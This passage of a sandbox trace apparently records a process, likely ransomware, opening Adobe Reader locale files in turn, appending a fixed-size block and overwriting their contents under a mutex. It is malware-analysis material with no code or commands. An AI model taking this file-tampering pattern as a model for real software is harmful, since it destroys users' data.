lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x20400 [0078.049] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.082] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x20400 [0079.094] WriteFile (in: hFile=0x1ec, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.095] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.095] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0079.095] CloseHandle (hObject=0x1ec) returned 1 [0079.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\PPKLITE.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\ppklite.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.096] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.096] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x84200 [0079.097] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.097] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.097] ReleaseMutex (hMutex=0x168) returned 1 [0079.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.NLD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.NLD", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.NLD", lpUsedDefaultChar=0x0) returned 11 [0079.097] ReadFile (in: hFile=0x1ec, lpBuffer=0x2899e18, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2899e18*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0079.108] ReadFile (in: hFile=0x1ec, lpBuffer=0x2899e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2899e18*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.116] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x83200 [0079.116] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.162] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x83200 [0079.162] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.162] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.163] WriteFile (in: hFile=0x1ec, lpBuffer=0x28a1e18*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a1e18*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0079.163] WriteFile (in: hFile=0x1ec, lpBuffer=0x28a1e18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a1e18*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.163] CloseHandle (hObject=0x1ec) returned 1 [0079.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.169] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.169] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe3 [0079.170] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.170] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.170] ReleaseMutex (hMutex=0x168) returned 1 [0079.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.170] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ee71c8, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee71c8*, lpNumberOfBytesRead=0x311f2bc*=0xe3, lpOverlapped=0x0) returned 1 [0079.173] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0079.173] WriteFile (in: hFile=0x1ec, lpBuffer=0x2665688*, nNumberOfBytesToWrite=0x66b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665688*, lpNumberOfBytesWritten=0x311f2d0*=0x66b, lpOverlapped=0x0) returned 1 [0079.173] CloseHandle (hObject=0x1ec) returned 1 [0079.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\BRdlang32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\brdlang32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.174] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.175] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3600 [0079.175] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.175] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.175] ReleaseMutex (hMutex=0x168) returned 1 [0079.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.POL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.POL", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.POL", lpUsedDefaultChar=0x0) returned 13 [0079.175] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.182] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2600 [0079.182] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.205] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2600 [0079.205] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669698*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.205] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.206] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.206] CloseHandle (hObject=0x1ec) returned 1 [0079.206] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Multimedia.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\multimedia.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.207] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.207] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x13600 [0079.207] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.207] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.207] ReleaseMutex (hMutex=0x168) returned 1 [0079.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.POL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.POL", cchWideChar=14, lpMultiByteStr=0x1f732cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.POL", lpUsedDefaultChar=0x0) returned 14 [0079.207] ReadFile (in: hFile=0x1ec, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.238] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12600 [0079.239] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12600 [0079.264] WriteFile (in: hFile=0x1ec, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.264] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.264] CloseHandle (hObject=0x1ec) returned 1 [0079.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\SendMail.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\sendmail.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.270] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.270] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3e00 [0079.270] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.270] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.270] ReleaseMutex (hMutex=0x168) returned 1 [0079.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.POL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.POL", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.POL", lpUsedDefaultChar=0x0) returned 12 [0079.270] ReadFile (in: hFile=0x1ec, lpBuffer=0x2669698, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2669698*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.278] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2e00 [0079.279] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.290] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2e00 [0079.291] WriteFile (in: hFile=0x1ec, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.292] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.292] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.292] CloseHandle (hObject=0x1ec) returned 1 [0079.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\AdobeCollabSync.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\adobecollabsync.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.293] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.293] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0079.294] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.294] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.294] ReleaseMutex (hMutex=0x168) returned 1 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.PTB", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0079.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.PTB", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.PTB", lpUsedDefaultChar=0x0) returned 19 [0079.294] ReadFile (in: hFile=0x1ec, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0079.361] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0079.361] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0079.361] CloseHandle (hObject=0x1ec) returned 1 [0079.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\IA32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\ia32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.362] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.362] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe00 [0079.362] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.362] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.362] ReleaseMutex (hMutex=0x168) returned 1 [0079.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.PTB", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0079.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.PTB", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.PTB", lpUsedDefaultChar=0x0) returned 8 [0079.363] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0079.547] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0079.547] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0079.548] CloseHandle (hObject=0x1ec) returned 1 [0079.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\SaveAsRTF.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\saveasrtf.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0079.549] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.549] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4a00 [0079.549] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0079.550] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.550] ReleaseMutex (hMutex=0x168) returned 1 [0079.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.PTB", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.PTB", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.PTB", lpUsedDefaultChar=0x0) returned 13 [0079.550] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.555] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a00 [0079.555] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.556] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a00 [0079.556] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.556] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0079.557] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.557] CloseHandle (hObject=0x1ec) returned 1 [0079.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Accessibility.RUM" (normalized: "c:\\program files 